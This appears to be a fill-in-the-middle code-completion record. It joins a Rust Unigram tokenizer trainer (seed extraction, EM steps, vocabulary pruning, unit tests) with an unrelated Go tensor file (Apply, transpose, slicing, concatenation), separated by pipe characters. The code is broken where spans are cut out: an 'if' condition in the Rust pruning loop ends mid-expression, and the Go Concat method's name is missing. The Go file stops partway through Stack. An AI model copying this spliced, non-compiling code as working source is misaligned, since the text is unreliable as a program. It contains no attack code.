    _progress: &Option<ProgressBar>,
) -> Vec<SentencePiece> {
    // Put all sentences in a string, separated by \0
    let total: usize = sentences
        .iter()
        .map(|(s, _)| s.chars().count())
        .sum::<usize>()
        + sentences.len();
    let mut flat_string = String::with_capacity(total);
    let mut all_chars: HashMap<char, u32> = HashMap::new();
    let c_sentence_boundary = '\0';
    let k_sentence_boundary = '\0'.to_string();
    for (string, n) in sentences {
        if string.is_empty() {
            continue;
        }
        flat_string.push_str(string);
        // XXX
        // Comment suggests we add sentence boundary, but it seems to be missing from actual
        // code in spm.
        flat_string.push_str(&k_sentence_boundary);
        for c in string.chars() {
            if c != c_sentence_boundary {
                // Char counts are weighted by the sentence count `n`.
                *all_chars.entry(c).or_insert(0) += n;
            }
        }
    }
    flat_string.shrink_to_fit();
    #[cfg(feature = "esaxx_fast")]
    let suffix = esaxx_rs::suffix(&flat_string).unwrap();
    #[cfg(not(feature = "esaxx_fast"))]
    let suffix = esaxx_rs::suffix_rs(&flat_string).unwrap();
    // Basic chars need to be in sentence pieces.
    let mut seed_sentencepieces: Vec<SentencePiece> = vec![];
    let mut sall_chars: Vec<_> = all_chars.into_iter().map(|(a, b)| (b, a)).collect();
    // Reversed order
    sall_chars.sort_by_key(|&a| Reverse(a));
    // Candidate substrings scored by frequency * length (chars covered).
    let mut substr_index: Vec<_> = suffix
        .iter()
        .filter_map(|(string, freq)| {
            if string.len() <= 1 {
                return None;
            }
            if string.contains(&c_sentence_boundary) {
                return None;
            }
            if !self.is_valid_sentencepiece(string) {
                return None;
            }
            let score = freq * string.len() as u32;
            // if let Some(p) = &progress {
            //     p.inc(1);
            // }
            Some((score, string))
        })
        .collect();
    // Fill seed_sentencepieces
    for (count, character) in sall_chars {
        seed_sentencepieces.push((character.to_string(), count.into()));
    }
    // sort by decreasing score
    substr_index.sort_by_key(|&a| Reverse(a));
    for (score, char_string) in substr_index {
        // Just in case
        assert!(self.is_valid_sentencepiece(char_string));
        let string: String = char_string.iter().collect();
        seed_sentencepieces.push((string, score.into()));
        if seed_sentencepieces.len() >= self.seed_size {
            break;
        }
    }
    // Scores are raw counts until here; convert to log-probabilities.
    to_log_prob(&mut seed_sentencepieces);
    seed_sentencepieces
}
fn prune_sentence_pieces(
&self,
model: &Unigram,
pieces: &[SentencePiece],
sentences: &[Sentence],
) -> Vec<SentencePiece> {
let mut always_keep = vec![true; pieces.len()];
let mut alternatives: Vec<Vec<usize>> = vec![Vec::new(); pieces.len()];
let bos_id = pieces.len() + 1;
let eos_id = pieces.len() + 2;
// First, segments the current sentencepieces to know
// how each sentencepiece is resegmented if this sentencepiece is removed
// from the vocabulary.
// To do so, we take the second best segmentation of sentencepiece[i].
// alternatives[i] stores the sequence of second best sentencepieces.
for (id, (token, _score)) in pieces.iter().enumerate() {
// Always keep unk.
if id == 0 {
always_keep[id] = false;
continue;
}
let mut lattice = Lattice::from(token, bos_id, eos_id);
model.populate_nodes(&mut lattice);
let nbests = lattice.nbest(2);
if nbests.len() == 1 {
always_keep[id] = true;
} else if nbests[0].len() >= 2 {
always_keep[id] = false;
} else if nbests[0].len() == 1 {
always_keep[id] = true;
for node in &nbests[1] {
let alt_id = node.borrow().id;
alternatives[id].push(alt_id);
}
}
}
// Second, segments all sentences to compute likelihood
// with a unigram language model. inverted[i] stores
// the set of sentence index where the sentencepieces[i] appears.
let chunk_size = std::cmp::max(sentences.len() / current_num_threads(), 1);
let indexed_sentences: Vec<(usize, &Sentence)> = sentences.iter().enumerate().collect();
let collected: (f64, Vec<f64>, Vec<Vec<usize>>) = indexed_sentences
.maybe_par_chunks(chunk_size)
.map(|enumerated_sentence_count_chunk| {
let mut vsum = 0.0;
let mut freq: Vec<f64> = vec![0.0; pieces.len()];
let mut inverted: Vec<Vec<usize>> = vec![Vec::new(); pieces.len()];
for (i, (sentence, count)) in enumerated_sentence_count_chunk {
let mut lattice = Lattice::from(sentence, bos_id, eos_id);
model.populate_nodes(&mut lattice);
vsum += *count as f64;
for node_ref in lattice.viterbi() {
let id = node_ref.borrow().id;
freq[id] += *count as f64;
inverted[id].push(*i);
}
}
(vsum, freq, inverted)
})
.reduce(
|| (0.0, vec![0.0; pieces.len()], vec![Vec::new(); pieces.len()]),
|(vsum, freq, inverted), (lvsum, lfreq, linverted)| {
(
vsum + lvsum,
freq.iter()
.zip(lfreq)
.map(|(global_el, local_el)| global_el + local_el)
.collect(),
inverted
.iter()
.zip(linverted)
.map(|(global_el, local_el)| [&global_el[..], &local_el[..]].concat())
.collect(),
)
},
);
let (vsum, freq, inverted) = collected;
let sum: f64 = freq.iter().sum();
let logsum = sum.ln();
let mut candidates: Vec<(usize, f64)> = vec![];
let mut new_pieces: Vec<SentencePiece> = Vec::with_capacity(self.vocab_size as usize);
new_pieces.push(pieces[0].clone());
// Finally, computes how likely the LM likelihood is reduced if
// the sentencepiece[i] is removed from the vocabulary.
// Since the exact computation of loss is difficult, we compute the
// loss approximately by assuming that all sentencepiece[i] in the sentences
// are replaced with alternatives[i] when sentencepiece[i] is removed.
for (id, (token, score)) in pieces.iter().enumerate() {
if id == 0 {
continue;
}
if freq[id] == 0.0 && !always_keep[id] {
// not found in Viterbi path. Can remove this entry safely.
continue;
} else if alternatives[id].is_empty() {
// no alternatives. Keeps this entry.
new_pieces.push((token.to_string(), *score));
} else {
let mut f = 0.0; // the frequency of pieces[i];
for n in &inverted[id] {
let score = sentences[*n].1 as f64;
f += score;
}
// TODO: Temporary hack to avoid Nans.
if f == 0.0 || f.is_nan() |
f /= vsum; // normalizes by all sentence frequency.
let logprob_sp = freq[id].ln() - logsum;
// After removing the sentencepiece[i], its frequency freq[i] is
// re-assigned to alternatives.
// new_sum = current_sum - freq[i] + freq[i] * alternatives.size()
// = current_sum + freq[i] (alternatives - 1)
let logsum_alt = (sum + freq[id] * (alternatives.len() - 1) as f64).ln();
// The frequencies of altenatives are increased by freq[i].
let mut logprob_alt = 0.0;
for n in &alternatives[id] {
logprob_alt += (freq[*n] + freq[id]).ln() - logsum_alt;
}
// loss: the diff of likelihood after removing the sentencepieces[i].
let loss = f * (logprob_sp - logprob_alt);
if loss.is_nan() {
panic!("");
}
candidates.push((id, loss));
}
}
let desired_vocab_size: usize = (self.vocab_size as usize * 11) / 10; // * 1.1
let pruned_size: usize = ((pieces.len() as f64) * self.shrinking_factor) as usize;
let pruned_size = desired_vocab_size.max(pruned_size);
candidates.sort_by(|(_, a), (_, b)| b.partial_cmp(a).unwrap());
for (id, _score) in candidates {
if new_pieces.len() == pruned_size {
break;
}
new_pieces.push(pieces[id].clone());
}
new_pieces.to_vec()
}
/// Update the progress bar with the new provided length and message
fn update_progress(&self, p: &Option<ProgressBar>, len: usize, message: &str) {
    if let Some(p) = p {
        p.set_message(message);
        p.set_length(len as u64);
        // Redraw at most ~100 times over the whole run.
        p.set_draw_delta(len as u64 / 100);
        p.reset();
    }
}
/// Set the progress bar in the finish state
fn finalize_progress(&self, p: &Option<ProgressBar>, final_len: usize) {
    if let Some(p) = p {
        p.set_length(final_len as u64);
        p.finish();
        // Leave the cursor on a fresh line after the bar.
        println!();
    }
}
/// E step of the EM loop: computes, for every piece, its expected frequency
/// over all sentences under the current model.
///
/// Returns `(objective, num_tokens, expected)` where `objective` is the
/// negated, frequency-normalized log-likelihood, `num_tokens` counts tokens
/// on the Viterbi paths, and `expected[i]` is the expected count of piece `i`.
fn run_e_step(&self, model: &Unigram, sentences: &[Sentence]) -> (f64, u32, Vec<f64>) {
    let all_sentence_freq: u32 = sentences.iter().map(|(_a, b)| *b).sum();
    // One chunk per thread (at least one sentence per chunk).
    let chunk_size = std::cmp::max(sentences.len() / current_num_threads(), 1);
    let collected: (f64, u32, Vec<f64>) = sentences
        .maybe_par_chunks(chunk_size)
        .map(|sentences_chunk| {
            let mut expected: Vec<f64> = vec![0.0; model.len()];
            let mut objs: f64 = 0.0;
            let mut ntokens: u32 = 0;
            for (string, freq) in sentences_chunk {
                // Build the segmentation lattice for this sentence and let the
                // model score every candidate piece inside it.
                let mut lattice = Lattice::from(string, model.bos_id, model.eos_id);
                model.populate_nodes(&mut lattice);
                // `z` is the log partition; marginals accumulate into `expected`.
                let z: f64 = lattice.populate_marginal(*freq as f64, &mut expected);
                if z.is_nan() {
                    panic!("likelihood is NAN. Input sentence may be too long.");
                }
                ntokens += lattice.viterbi().len() as u32;
                objs -= z / (all_sentence_freq as f64);
            }
            (objs, ntokens, expected)
        })
        .reduce(
            // Identity element for the parallel reduction.
            || (0.0, 0, vec![0.0; model.len()]),
            |(objs, ntokens, expected), (lobjs, lntokens, lexpected)| {
                (
                    objs + lobjs,
                    ntokens + lntokens,
                    // Element-wise sum of the per-chunk expectations.
                    expected
                        .iter()
                        .zip(lexpected)
                        .map(|(global_el, local_el)| global_el + local_el)
                        .collect(),
                )
            },
        );
    collected
}
/// M step of the EM loop: converts expected frequencies from the E step into
/// new piece scores, dropping pieces whose expected count is below threshold.
///
/// Panics if `pieces` and `expected` differ in length.
fn run_m_step(&self, pieces: &[SentencePiece], expected: &[f64]) -> Vec<SentencePiece> {
    if pieces.len() != expected.len() {
        panic!(
            "Those two iterators are supposed to be the same length ({} vs {})",
            pieces.len(),
            expected.len()
        );
    }
    let mut new_pieces: Vec<SentencePiece> =
        Vec::with_capacity(self.vocab_size.try_into().unwrap());
    let mut sum = 0.0;
    // Pieces expected to appear less than this are pruned outright.
    let expected_frequency_threshold = 0.5;
    for (i, (freq, (piece, _score))) in expected.iter().zip(pieces).enumerate() {
        // Always keep unk.
        if i == 0 {
            // NaN marks the unk entry as carrying no real score.
            new_pieces.push((piece.clone(), f64::NAN));
            continue;
        }
        if *freq < expected_frequency_threshold {
            continue;
        }
        new_pieces.push((piece.clone(), *freq));
        sum += freq;
    }
    // // Here we do not use the original EM, but use the
    // // Bayesianified/DPified EM algorithm.
    // // https://cs.stanford.edu/~pliang/papers/tutorial-acl2007-talk.pdf
    // // This modification will act as a sparse prior.
    let logsum = digamma(sum);
    let new_pieces: Vec<_> = new_pieces
        .into_iter()
        .map(|(s, c)| (s, digamma(c) - logsum))
        .collect();
    new_pieces
}
/// Run the full Unigram training pipeline on `sentences`, writing the trained
/// model into `model` and returning the special tokens to add afterwards.
///
/// Steps: seed pieces from frequent substrings, EM refinement with periodic
/// pruning until the vocabulary fits, then finalization to `vocab_size`.
pub fn do_train(
    &self,
    sentences: Vec<Sentence>,
    model: &mut Unigram,
) -> Result<Vec<AddedToken>> {
    let progress = self.setup_progress();
    //
    // 1. Compute frequent substrings
    // TODO Should be able to upgrade to u64 when needed
    self.update_progress(&progress, sentences.len(), "Suffix array seeds");
    let mut pieces: Vec<SentencePiece> =
        Vec::with_capacity(self.vocab_size.try_into().unwrap());
    // We use a UNK token when training, whatever the `self.unk_token`
    pieces.push(("<UNK>".into(), f64::NAN));
    pieces.extend(self.make_seed_sentence_pieces(&sentences, &progress));
    self.finalize_progress(&progress, sentences.len());
    // Useful to check compatibility with spm.
    debug!(
        "Using {} pieces on {} sentences for EM training",
        pieces.len(),
        sentences.len()
    );
    let desired_vocab_size: usize = (self.vocab_size as usize * 11) / 10; // * 1.1
    // 2. Run E-M Loops to fine grain the pieces.
    // We will shrink the vocab by shrinking_factor every loop on average
    // Some other pieces are dropped if logprob is too small
    // V = N * (f)**k
    // k = log(V / N) / log(f)
    let expected_loops = (((desired_vocab_size as f64).ln() - (pieces.len() as f64).ln())
        / self.shrinking_factor.ln()) as usize
        + 1;
    let expected_updates = expected_loops * self.n_sub_iterations as usize;
    self.update_progress(&progress, expected_updates, "EM training");
    // Every distinct char must fit in the vocabulary, or training cannot succeed.
    let required_chars = self.required_chars(&sentences);
    if required_chars.len() as u32 > self.vocab_size {
        return Err(Box::new(UnigramTrainerError::VocabularyTooSmall));
    }
    let mut new_model = Unigram::from(pieces.clone(), Some(0), false)?;
    loop {
        // Sub-EM iteration.
        for _iter in 0..self.n_sub_iterations {
            // Executes E step
            let (_objective, _num_tokens, expected) = self.run_e_step(&new_model, &sentences);
            // Executes M step.
            pieces = self.run_m_step(&pieces, &expected);
            new_model = Unigram::from(pieces.clone(), Some(0), false)?;
            // Useful comment for checking compatibility with spm
            // NOTE(review): the ratio below divides by `model.len()` (the
            // caller-provided output model, still untrained at this point)
            // rather than `new_model.len()` — confirm this debug metric is
            // intended.
            debug!(
                "Em iter={} size={} obj={} num_tokens={} num_tokens/piece={}",
                _iter,
                new_model.len(),
                _objective,
                _num_tokens,
                _num_tokens as f64 / model.len() as f64
            );
            if let Some(p) = &progress {
                p.inc(1);
            }
        } // end of Sub EM iteration
        // Stops the iteration when the size of sentences reaches to the
        // desired symbol size.
        if pieces.len() <= desired_vocab_size {
            break;
        }
        // Prunes pieces.
        pieces = self.prune_sentence_pieces(&new_model, &pieces, &sentences);
        new_model = Unigram::from(pieces.clone(), Some(0), false)?;
    }
    self.finalize_progress(&progress, expected_updates);
    // Finally, adjusts the size of sentencepices to be |vocab_size|.
    *model = self.finalize(new_model, required_chars)?;
    Ok(self.special_tokens.clone())
}
}
impl Trainer for UnigramTrainer {
    type Model = Unigram;
    /// Train a Unigram model
    fn train(&self, model: &mut Unigram) -> Result<Vec<AddedToken>> {
        // Materialize the word counts accumulated by `feed` into sentences.
        let sentences: Vec<_> = self.words.iter().map(|(s, i)| (s.to_owned(), *i)).collect();
        self.do_train(sentences, model)
    }
    /// Whether we should show progress
    fn should_show_progress(&self) -> bool {
        self.show_progress
    }
    /// Accumulate word counts from the (possibly parallel) input sequences,
    /// after running each sequence through `process` (pre-tokenization).
    fn feed<I, S, F>(&mut self, iterator: I, process: F) -> Result<()>
    where
        I: Iterator<Item = S> + Send,
        S: AsRef<str> + Send,
        F: Fn(&str) -> Result<Vec<String>> + Sync,
    {
        let words: Result<HashMap<String, u32>> = iterator
            .maybe_par_bridge()
            .map(|sequence| {
                // Per-sequence local counts, merged in the reduce below.
                let words = process(sequence.as_ref())?;
                let mut map = HashMap::new();
                for word in words {
                    map.entry(word).and_modify(|c| *c += 1).or_insert(1);
                }
                Ok(map)
            })
            .reduce(
                || Ok(HashMap::new()),
                |acc, ws| {
                    // Any Err short-circuits via `?` on both operands.
                    let mut acc = acc?;
                    for (k, v) in ws? {
                        acc.entry(k).and_modify(|c| *c += v).or_insert(v);
                    }
                    Ok(acc)
                },
            );
        self.words = words?;
        Ok(())
    }
}
#[cfg(test)]
mod tests {
use super::*;
use assert_approx_eq::assert_approx_eq;
use std::iter::FromIterator;
#[test]
fn test_unigram_chars() {
let trainer = UnigramTrainerBuilder::default()
.show_progress(false)
.build()
.unwrap();
let sentences = vec![
("This is a".to_string(), 1),
("こんにちは友達".to_string(), 1),
];
let required_chars = trainer.required_chars(&sentences);
assert_eq!(required_chars.len(), 13);
let progress = None;
let table = trainer.make_seed_sentence_pieces(&sentences, &progress);
let target_strings = vec![
"s", "i", " ", "達", "友", "ん", "は", "に", "ち", "こ", "h", "a", "T", "is ", "s ",
];
let strings: Vec<_> = table.iter().map(|(string, _)| string).collect();
assert_eq!(strings, target_strings);
let scores = table.iter().map(|(_, score)| score);
let target_scores = vec![
-2.5649493574615367, // 2.0
-2.5649493574615367, // 2.0
-2.5649493574615367, // 2.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-1.4663370687934272, // 6.0
-1.8718021769015916, // 4.0
];
for (score, target_score) in scores.zip(target_scores) {
assert_approx_eq!(*score, target_score, 0.01);
}
}
#[test]
fn test_initial_alphabet() {
let trainer = UnigramTrainerBuilder::default()
.show_progress(false)
.initial_alphabet(HashSet::from_iter(vec!['a', 'b', 'c', 'd', 'e', 'f']))
.build()
.unwrap();
let sentences = vec![("こんにちは友達".to_string(), 1)];
let required_chars = trainer.required_chars(&sentences);
assert_eq!(
required_chars,
vec!["こ", "ん", "に", "ち", "は", "友", "達", "a", "b", "c", "d", "e", "f"]
.into_iter()
.map(|s| s.to_owned())
.collect::<HashSet<_>>()
);
}
#[test]
fn test_unk_token() {
// 1. Should add `unk_token` as first special token
let trainer = UnigramTrainerBuilder::default()
.show_progress(false)
.special_tokens(vec![
AddedToken::from("[SEP]", true),
AddedToken::from("[CLS]", true),
])
.unk_token(Some("[UNK]".into()))
.build()
.unwrap();
let mut unigram = Unigram::default();
trainer
.do_train(vec![("The".into(), 12), ("are".into(), 11)], &mut unigram)
.unwrap();
let mut pieces = unigram.iter();
assert_eq!(pieces.next(), Some(&("[UNK]".into(), 0.0)));
assert_eq!(pieces.next(), Some(&("[SEP]".into(), 0.0)));
assert_eq!(pieces.next(), Some(&("[CLS]".into(), 0.0)));
// 2. Let it where it is
let trainer = UnigramTrainerBuilder::default()
.show_progress(false)
.special_tokens(vec![
AddedToken::from("[SEP]", true),
AddedToken::from("[CLS]", true),
AddedToken::from("[UNK]", true),
])
.unk_token(Some("[UNK]".into()))
.build()
.unwrap();
let mut unigram = Unigram::default();
trainer
.do_train(vec![("The".into(), 12), ("are".into(), 11)], &mut unigram)
.unwrap();
let mut pieces = unigram.iter();
assert_eq!(pieces.next(), Some(&("[SEP]".into(), 0.0)));
assert_eq!(pieces.next(), Some(&("[CLS]".into(), 0.0)));
assert_eq!(pieces.next(), Some(&("[UNK]".into(), 0.0)));
// 3. Don't put it there if not needed
let trainer = UnigramTrainerBuilder::default()
.show_progress(false)
.build()
.unwrap();
let mut unigram = Unigram::default();
trainer
.do_train(vec![("The".into(), 12), ("are".into(), 11)], &mut unigram)
.unwrap();
let mut pieces = unigram.iter();
assert_eq!(pieces.next().unwrap().0, "e".to_string());
}
#[test]
fn test_special_tokens() {
let trainer = UnigramTrainerBuilder::default()
.show_progress(false)
.special_tokens(vec![
AddedToken::from("[SEP]", true),
AddedToken::from("[CLS]", true),
])
.build()
.unwrap();
let mut unigram = Unigram::default();
trainer
.do_train(vec![("The".into(), 12), ("are".into(), 11)], &mut unigram)
.unwrap();
let mut pieces = unigram.iter();
assert_eq!(pieces.next(), Some(&("[SEP]".into(), 0.0)));
assert_eq!(pieces.next(), Some(&("[CLS]".into(), 0.0)));
}
#[test]
fn test_to_log_prob() {
let mut a = vec![("".to_string(), 1.0), ("".to_string(), 2.0)];
to_log_prob(&mut a);
let scores = a.iter().map(|(_, score)| *score).collect::<Vec<_>>();
// ln(1) - ln(3)
assert_approx_eq!(scores[0], -1.098, 0.01);
// ln(2) - ln(3)
assert_approx_eq!(scores[1], -0.405, 0.01);
}
}
| {
// new_pieces.push((token.to_string(), *score));
continue;
} | conditional_block |
dense_matop.go | package tensor
import (
"github.com/pkg/errors"
"reflect"
)
// Apply applies a function to all the values in the ndarray
func (t *Dense) Apply(fn interface{}, opts ...FuncOpt) (retVal Tensor, err error) {
fo := parseFuncOpts(opts...)
reuseT, incr := fo.incrReuse()
safe := fo.safe()
var reuse *Dense
if reuse, err = getDense(reuseT); err != nil {
return
}
// check reuse and stuff
var res *Dense
switch {
case reuse != nil:
res = reuse
if res.len() != t.Size() {
err = errors.Errorf(shapeMismatch, t.Shape(), reuse.Shape())
return
}
case !safe:
res = t
default:
if t.IsMaterializable() {
res = t.Materialize().(*Dense)
} else {
res = t.Clone().(*Dense)
}
}
// do
switch {
case t.viewOf == nil:
err = res.mapFn(fn, incr)
case t.viewOf != nil:
it := IteratorFromDense(t)
if err = res.iterMap(fn, it, incr); err != nil {
return
}
default:
err = errors.Errorf("Apply not implemented for this state: isView: %t and incr: %t", t.viewOf == nil, incr)
return
}
// set retVal
switch {
case reuse != nil:
if err = reuseCheckShape(reuse, t.Shape()); err != nil {
return
}
retVal = reuse
case !safe:
retVal = t
default:
retVal = res
// retVal = New(Of(t.t), WithBacking(res), WithShape(t.Shape()...))
}
return
}
// T performs a thunked transpose. It doesn't actually do anything, except store extra information about the post-transposed shapes and strides
// Usually this is more than enough, as BLAS will handle the rest of the transpose
func (t *Dense) T(axes ...int) (err error) {
var transform *AP
if transform, axes, err = t.AP.T(axes...); err != nil {
return handleNoOp(err)
}
// is there any old transposes that need to be done first?
// this is important, because any old transposes for dim >=3 are merely permutations of the strides
if t.old != nil {
if t.IsVector() {
// the transform that was calculated was a waste of time - return it to the pool then untranspose
ReturnAP(transform)
t.UT()
return
}
// check if the current axes are just a reverse of the previous transpose's
isReversed := true
for i, s := range t.oshape() {
if transform.Shape()[i] != s {
isReversed = false
break
}
}
// if it is reversed, well, we just restore the backed up one
if isReversed {
ReturnAP(transform)
t.UT()
return
}
// cool beans. No funny reversals. We'd have to actually do transpose then
t.Transpose()
}
// swap out the old and the new
t.old = t.AP
t.transposeWith = axes
t.AP = transform
return nil
}
// UT is a quick way to untranspose a currently transposed *Dense
// The reason for having this is quite simply illustrated by this problem:
// T = NewTensor(WithShape(2,3,4))
// T.T(1,2,0)
//
// To untranspose that, we'd need to apply a transpose of (2,0,1).
// This means having to keep track and calculate the transposes.
// Instead, here's a helpful convenience function to instantly untranspose any previous transposes.
//
// Nothing will happen if there was no previous transpose
func (t *Dense) UT() {
if t.old != nil {
ReturnAP(t.AP)
ReturnInts(t.transposeWith)
t.AP = t.old
t.old = nil
t.transposeWith = nil
}
}
// SafeT is exactly like T(), except it returns a new *Dense. The data is also copied over, unmoved.
func (t *Dense) SafeT(axes ...int) (retVal *Dense, err error) {
var transform *AP
if transform, axes, err = t.AP.T(axes...); err != nil {
if err = handleNoOp(err); err != nil {
return
}
}
retVal = recycledDense(t.t, Shape{t.len()})
copyDense(retVal, t)
retVal.AP = transform
retVal.old = t.AP.Clone()
retVal.transposeWith = axes
return
}
// Transpose() actually transposes the data.
// This is a generalized version of the inplace matrix transposition algorithm from Wikipedia:
// https://en.wikipedia.org/wiki/In-place_matrix_transposition
func (t *Dense) Transpose() {
// if there is no oldinfo, that means the current info is the latest, and not the transpose
if t.old == nil {
return
}
if t.IsScalar() {
return // cannot transpose scalars
}
defer func() {
ReturnAP(t.old)
t.old = nil
t.transposeWith = nil
}()
expShape := t.Shape()
expStrides := expShape.calcStrides() // important! because the strides would have changed once the underlying data changed
defer ReturnInts(expStrides)
defer func() {
t.setShape(expShape...)
t.sanity()
}()
if t.IsVector() {
// no change of strides.
return
}
t.transpose(expStrides)
}
// At returns the value at the given coordinate
func (t *Dense) At(coords ...int) (interface{}, error) {
if len(coords) != t.Dims() {
return nil, errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.at(coords...)
if err != nil {
return nil, errors.Wrap(err, "At()")
}
return t.Get(at), nil
}
// MaskAt returns the value of the mask at a given coordinate
// returns false (valid) if not tensor is not masked
func (t *Dense) MaskAt(coords ...int) (bool, error) {
if !t.IsMasked() {
return false, nil
}
if len(coords) != t.Dims() {
return true, errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.maskAt(coords...)
if err != nil {
return true, errors.Wrap(err, "MaskAt()")
}
return t.mask[at], nil
}
// SetAt sets the value at the given coordinate
func (t *Dense) SetAt(v interface{}, coords ...int) error {
if len(coords) != t.Dims() {
return errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.at(coords...)
if err != nil {
return errors.Wrap(err, "SetAt()")
}
t.Set(at, v)
return nil
}
// SetMaskAtDataIndex set the value of the mask at a given index
func (t *Dense) SetMaskAtIndex(v bool, i int) error {
if !t.IsMasked() {
return nil
}
t.mask[i] = v
return nil
}
// SetMaskAt sets the mask value at the given coordinate
func (t *Dense) SetMaskAt(v bool, coords ...int) error {
if !t.IsMasked() {
return nil
}
if len(coords) != t.Dims() {
return errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.maskAt(coords...)
if err != nil {
return errors.Wrap(err, "SetAt()")
}
t.mask[at] = v
return nil
}
// Repeat is like Numpy's repeat. It repeats the elements of an array.
// The repeats param defines how many times each element in the axis is repeated.
// Just like NumPy, the repeats param is broadcasted to fit the size of the given axis.
func (t *Dense) Repeat(axis int, repeats ...int) (retVal Tensor, err error) {
var newShape Shape
var size int
if newShape, repeats, size, err = t.Shape().Repeat(axis, repeats...); err != nil {
return nil, errors.Wrap(err, "Unable to get repeated shape")
}
if axis == AllAxes {
axis = 0
}
d := recycledDense(t.t, newShape)
// d := New(Of(t.t), WithShape(newShape...))
var outers int
if t.IsScalar() {
outers = 1
} else {
outers = ProdInts(t.Shape()[0:axis])
if outers == 0 {
outers = 1
}
}
var stride, newStride int
if newShape.IsVector() || t.IsVector() {
stride = 1 // special case because CalcStrides() will return []int{1} as the strides for a vector
} else {
stride = t.ostrides()[axis]
}
if newShape.IsVector() {
newStride = 1
} else {
newStride = d.ostrides()[axis]
}
var destStart, srcStart int
for i := 0; i < outers; i++ {
for j := 0; j < size; j++ {
var tmp int
tmp = repeats[j]
for k := 0; k < tmp; k++ {
if srcStart >= t.len() || destStart+stride > d.len() {
break
}
copySliced(d, destStart, d.len(), t, srcStart, t.len())
destStart += newStride
}
srcStart += stride
}
}
return d, nil
}
// CopyTo copies the underlying data to the destination *Dense. The original data is untouched.
// Note: CopyTo doesn't care about the metadata of the destination *Dense. Take for example:
// T = NewTensor(WithShape(6))
// T2 = NewTensor(WithShape(2,3))
// err = T.CopyTo(T2) // err == nil
//
// The only time that this will fail is if the underlying sizes are different
func (t *Dense) CopyTo(other *Dense) error {
if other == t {
return nil // nothing to copy to. Maybe return NoOpErr?
}
if other.Size() != t.Size() {
return errors.Errorf(sizeMismatch, t.Size(), other.Size())
}
// easy peasy lemon squeezy
if t.viewOf == nil && other.viewOf == nil {
copyDense(other, t)
return nil
}
return errors.Errorf(methodNYI, "CopyTo", "views")
}
// Slice performs slicing on the *Dense Tensor. It returns a view which shares the same underlying memory as the original *Dense.
//
// Given:
// T = NewTensor(WithShape(2,2), WithBacking(RangeFloat64(0,4)))
// V, _ := T.Slice(nil, singleSlice(1)) // T[:, 1]
//
// Any modification to the values in V, will be reflected in T as well.
//
// The method treats <nil> as equivalent to a colon slice. T.Slice(nil) is equivalent to T[:] in Numpy syntax
func (t *Dense) Slice(slices ...Slice) (retVal Tensor, err error) {
var newAP *AP
var ndStart, ndEnd int
if newAP, ndStart, ndEnd, err = t.AP.S(t.len(), slices...); err != nil {
return
}
view := new(Dense)
view.t = t.t
view.viewOf = t
view.AP = newAP
view.hdr = new(reflect.SliceHeader)
view.data = t.data
view.hdr.Data = t.hdr.Data
view.hdr.Len = t.hdr.Len
view.hdr.Cap = t.hdr.Cap
view.slice(ndStart, ndEnd)
if t.IsMasked() {
view.mask = t.mask[ndStart:ndEnd]
}
return view, err
}
// RollAxis rolls the axis backwards until it lies in the given position.
//
// This method was adapted from Numpy's Rollaxis. The licence for Numpy is a BSD-like licence and can be found here: https://github.com/numpy/numpy/blob/master/LICENSE.txt
//
// As a result of being adapted from Numpy, the quirks are also adapted. A good guide reducing the confusion around rollaxis can be found here: http://stackoverflow.com/questions/29891583/reason-why-numpy-rollaxis-is-so-confusing (see answer by hpaulj)
func (t *Dense) RollAxis(axis, start int, safe bool) (retVal *Dense, err error) {
dims := t.Dims()
if !(axis >= 0 && axis < dims) {
err = errors.Errorf(invalidAxis, axis, dims)
return
}
if !(start >= 0 && start <= dims) {
err = errors.Wrap(errors.Errorf(invalidAxis, axis, dims), "Start axis is wrong")
return
}
if axis < start {
start--
}
if axis == start {
retVal = t
return
}
axes := BorrowInts(dims)
defer ReturnInts(axes)
for i := 0; i < dims; i++ {
axes[i] = i
}
copy(axes[axis:], axes[axis+1:])
copy(axes[start+1:], axes[start:])
axes[start] = axis
if safe {
return t.SafeT(axes...)
}
err = t.T(axes...)
retVal = t
return
}
// Concat concatenates the other tensors along the given axis. It is like Numpy's concatenate() function.
func (t *Dense) | (axis int, Ts ...*Dense) (retVal *Dense, err error) {
ss := make([]Shape, len(Ts))
var isMasked = false
for i, T := range Ts {
ss[i] = T.Shape()
isMasked = isMasked || T.IsMasked()
}
var newShape Shape
if newShape, err = t.Shape().Concat(axis, ss...); err != nil {
return
}
retVal = recycledDense(t.t, newShape)
if isMasked {
retVal.makeMask()
}
all := make([]*Dense, len(Ts)+1)
all[0] = t
copy(all[1:], Ts)
// special case
var start, end int
for _, T := range all {
end += T.Shape()[axis]
slices := make([]Slice, axis+1)
slices[axis] = makeRS(start, end)
var v *Dense
if v, err = sliceDense(retVal, slices...); err != nil {
return
}
if v.IsVector() && T.IsMatrix() && axis == 0 {
v.reshape(v.shape[0], 1)
}
if err = assignArray(v, T); err != nil {
return
}
start = end
}
return
}
// Hstack stacks other tensors columnwise (horizontal stacking)
func (t *Dense) Hstack(others ...*Dense) (*Dense, error) {
// check that everything is at least 1D
if t.Dims() == 0 {
return nil, errors.Errorf(atleastDims, 1)
}
for _, d := range others {
if d.Dims() < 1 {
return nil, errors.Errorf(atleastDims, 1)
}
}
if t.Dims() == 1 {
return t.Concat(0, others...)
}
return t.Concat(1, others...)
}
// Vstack stacks other tensors rowwise (vertical stacking). Vertical stacking requires all involved Tensors to have at least 2 dimensions
func (t *Dense) Vstack(others ...*Dense) (*Dense, error) {
// check that everything is at least 2D
if t.Dims() < 2 {
return nil, errors.Errorf(atleastDims, 2)
}
for _, d := range others {
if d.Dims() < 2 {
return nil, errors.Errorf(atleastDims, 2)
}
}
return t.Concat(0, others...)
}
// Stack stacks the other tensors along the axis specified. It is like Numpy's stack function.
func (t *Dense) Stack(axis int, others ...*Dense) (retVal *Dense, err error) {
opdims := t.Dims()
if axis >= opdims+1 {
err = errors.Errorf(dimMismatch, opdims+1, axis)
return
}
newShape := Shape(BorrowInts(opdims + 1))
newShape[axis] = len(others) + 1
shape := t.Shape()
var cur int
for i, s := range shape {
if i == axis {
cur++
}
